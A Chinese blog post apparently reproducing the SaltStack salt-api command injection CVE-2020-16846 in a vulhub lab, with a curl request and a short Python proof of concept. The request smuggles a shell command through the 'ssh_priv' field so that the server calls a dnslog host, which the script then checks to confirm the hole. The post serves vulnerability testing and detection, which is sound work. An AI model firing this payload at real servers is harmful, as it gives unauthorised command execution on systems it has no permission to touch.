SaltStack 命令注入漏洞(CVE-2020-16846)复现,python编写POC

最新推荐文章于 2024-03-28 15:36:31 发布
最新推荐文章于 2024-03-28 15:36:31 发布
阅读量276 收藏
点赞数
分类专栏: 漏洞复现 文章标签: python 安全漏洞 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangqiao258/article/details/120691649
版权

环境搭建:

使用vulhub,进入对应文件夹启动环境:


[root@localhost ~]# cd /home/vulhub/saltstack/CVE-2020-16846/
[root@localhost CVE-2020-16846]# docker-compose up -d

查看端口:


[root@localhost CVE-2020-16846]# docker ps
CONTAINER ID   IMAGE                   COMMAND                  CREATED         STATUS         PORTS                                                                                                                                             NAMES
0043f4957bd6   vulhub/saltstack:3002   "/usr/bin/dumb-init …"   6 seconds ago   Up 5 seconds   0.0.0.0:4505-4506->4505-4506/tcp, :::4505-4506->4505-4506/tcp, 0.0.0.0:8000->8000/tcp, :::8000->8000/tcp, 0.0.0.0:2222->22/tcp, :::2222->22/tcp   cve-2020-16846_saltstack_1
[root@localhost CVE-2020-16846]#

漏洞复现:

使用KALI向https://your-ip:8000/run发送如下数据包:

┌──(root💀kali)-[~]
└─# curl -v -sk -X POST https://192.168.10.10:8000/run \
-H 'Content-Type: application/json' \
-d '{"client":"ssh","tgt":"*","fun":"anything","eauth":"anything","ssh_priv":"/dev/null < /dev/null; curl erqqbd.dnslog.cn #"}'

在这里插入图片描述

POC编写:

import requests,random,time
requests.packages.urllib3.disable_warnings() #去除告警


url = "https://192.168.10.10:8000/run"
session = requests.session()
dnslog = session.get(f"http://www.dnslog.cn/getdomain.php?t={str(random.random())}").text  # 获取一个子域名

headers = {
    'Content-Type': 'application/json',
}
data = '{"client":"ssh","tgt":"*","fun":"anything","eauth":"anything","ssh_priv":"/dev/null < /dev/null; curl %s #"}'%dnslog

requests.post(url, headers=headers, data=data, verify=False)
time.sleep(2)

dnslog_res = session.get(f"http://www.dnslog.cn/getrecords.php?t={str(random.random())}").text # 获取这个子域名被请求的结果
if dnslog in dnslog_res:
    print("CVE-2020-16846  存在")

pycharm运行结果:在这里插入图片描述

~王
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
Python中的10个常见安全漏洞及修复方法
gaojian5422的博客
02-28 1953
Python中的10个常见安全漏洞及修复方法
SaltStack 远程命令执行漏洞CVE-2020-16846
最新发布
ANOrange的博客
03-28 394
本地模拟场景复现saltstack远程命令执行漏洞
CVE-2020-16846Saltstack_未授权命令执行漏洞
weixin_40646615的博客
06-04 425
CVE-2020-16846Saltstack_未授权命令执行漏洞 20210510 一、漏洞简介 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。 2020年11月SaltStack官方披露了CVE-2020-16846CVE-2020-25592两个漏洞, 其中CVE-2020-25592允许任意用户调用SSH模块,CVE-2020-16846允许用户执行任意命令。 组合这两个漏洞,将可以使未授权的攻击者通过Salt API执行任意命令。 二、漏洞影响 SaltSt
SaltStack 命令注入漏洞CVE-2020-16846
黑白的博客
12-06 1794
声明 好好学习,天天向上 漏洞描述 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。2020年11月SaltStack官方披露了CVE-2020-16846CVE-2020-25592两个漏洞 其中CVE-2020-25592允许任意用户调用SSH模块 CVE-2020-16846允许用户执行任意命令。组合这两个漏洞,将可以使未授权的攻击者通过Salt API执行任意命令 影响范围 SaltStack < 3002.1 SaltStack < 3001.3 Salt
SaltStack Shell 注入 (CVE-2020-16846)漏洞复现
thelostworld
12-21 492
SaltStack Shell 注入 (CVE-2020-16846)漏洞复现 一、漏洞简介 SaltStack是一个分布式运维系统,在互联网场景中被广泛应用,有以下两个主要功能: •配置管理系统,能够将远程节点维护在一个预定义的状态 •分布式远程执行系统,用于在远程节点上单独或通过任意选择标准来执行命令和查询数据 CVE-2020-16846CVE-2020-25592组合使用可在未授权的情况下通过salt-api接口执行任意命令。...
CVE-2017-7269-Echo-PoCCVE-2017-7269回显PoC,用于远程入侵检测。
03-02
我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address...
dnspooq:DNSpooq-dnsmasq缓存中毒(CVE-2020-25686,CVE-2020-25684,CVE-2020-25685)
04-14
DNSpooq PoC-dnsmasq缓存中毒(CVE-2020-25686,CVE-2020-25684,CVE-2020-25685) 仅用于教育目的 要求 Docker撰写 码头工人 开发 发射容器 $ docker-compose up -d 运行exploit.py $ docker-compose exec ...
SaltStack命令执行(CVE-2020-16846)
m0_65150886的博客
02-27 410
CVE-2020-16846CVE-2020-25592组合使用可在未授权的情况下通过salt-api接口执行任意命令CVE-2020-25592允许任意用户调用SSH模块,CVE-2020-16846允许用户执行任意命令。salt-api虽不是默认开启配置,但绝大多数SaltStack用户会选择开启salt-api,故存在较高风险。SaltStack是一个分布式运维系统,在互联网场景中被广泛应用,主要功能有配置管理系统,能够将远程节点维护在一个预定义的状态;4.进入容器查看文件成功创建。
详述SaltStack Salt 命令注入漏洞CVE-2020-16846/25592)
smellycat000的专栏
12-01 836
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队11月3日,SaltStack 发布 Salt 安全补丁,修复了三个严重漏洞,其中两个是为了回应起初通过 ZDI 报告的5个...
SaltStack命令注入漏洞分析(CVE-2020-16846
不忘初心,护天下安全!
07-13 348
SaltStack是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能,基于Python语言实现,结合轻量级消息队列(ZeroMQ)与Python第三方模块(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)构建。通过部署SaltStack,我们可以在成千万台服务器上做到批量执行命令,根据不同业务进行配置集中化管理、分发文件、采集服务器数据、操作系统基础及软件包管理等。 CVE-2020-16846CVE-2020-25592组合使用可在未授
SaltStack Shell注入CVE-2020-16846漏洞复现
Redredredfish的博客
09-15 473
漏洞概述 ①漏洞简介 2020年11月,SaltStack正式披露了两个漏洞CVE-2020-16846CVE-2020-25592。CVE-2020-25592允许任意用户使用SSH模块,CVE-2020-16846允许用户执行任意命令。链接这两个漏洞将允许未经授权的攻击者通过Salt API执行任意命令。 ②SaltStack SaltStack是基于Python开发的一套C/S架构配置管理工具,其使用server-agent通信模型部署轻松迅速,扩展性好,容易管理大批量服务器,可实现服务器之间
CVE-2020-7471漏洞复现(SQL注入
anlalu233的博客
04-18 1992
1.漏洞影响范围 /受影响版本 Django 1.11.x < 1.11.28 Django 2.2.x < 2.2.10 Django 3.0.x < 3.0.3 Django 主开发分支 /不受影响产品版本 Django 1.11.28 Django 2.2.10 Django 3.0.3 2.前期准备 查看: 以下参考https://blog.csdn.net/qq_412...
漏洞通告】Apache Dubbo Provider默认反序列化远程代码执行漏洞CVE-2020-1948)补丁绕过通告
爱国小白帽
07-01 1107
漏洞通告】Apache Dubbo Provider默认反序列化远程代码执行漏洞CVE-2020-1948)补丁绕过通告 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 昨天 通告编号:NS-2020-0038-1 2020-06-30 TA****G: Apache Dubbo、反序列化、CVE-2020-1948、补丁绕过 漏洞危害: 攻击者利用此漏洞,可实现远程代码执行。 版本: 1.1 1 漏洞概述 6月23日,Apache Du
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8088
多次跳转导致的ssrf
CVE-2020-14364:QEMU USB模块越界读写漏洞通告
爱国小白帽
08-25 1510
360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-082502 报告来源:360CERT 报告作者:360CERT 更新日期:2020-08-25 0x01 漏洞简述 2020年08月25日,360CERT监测发现qemu 发布了 qemu 内存越界漏洞 的风险通告,该漏洞编号为 CVE-2020-14364 ,漏洞等级:严重,漏洞评分:10。 qemu 已发布安全补丁 攻击者通过 构造特殊的内存数据 ,可造成虚拟机逃逸并执行任意代码 的影响
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值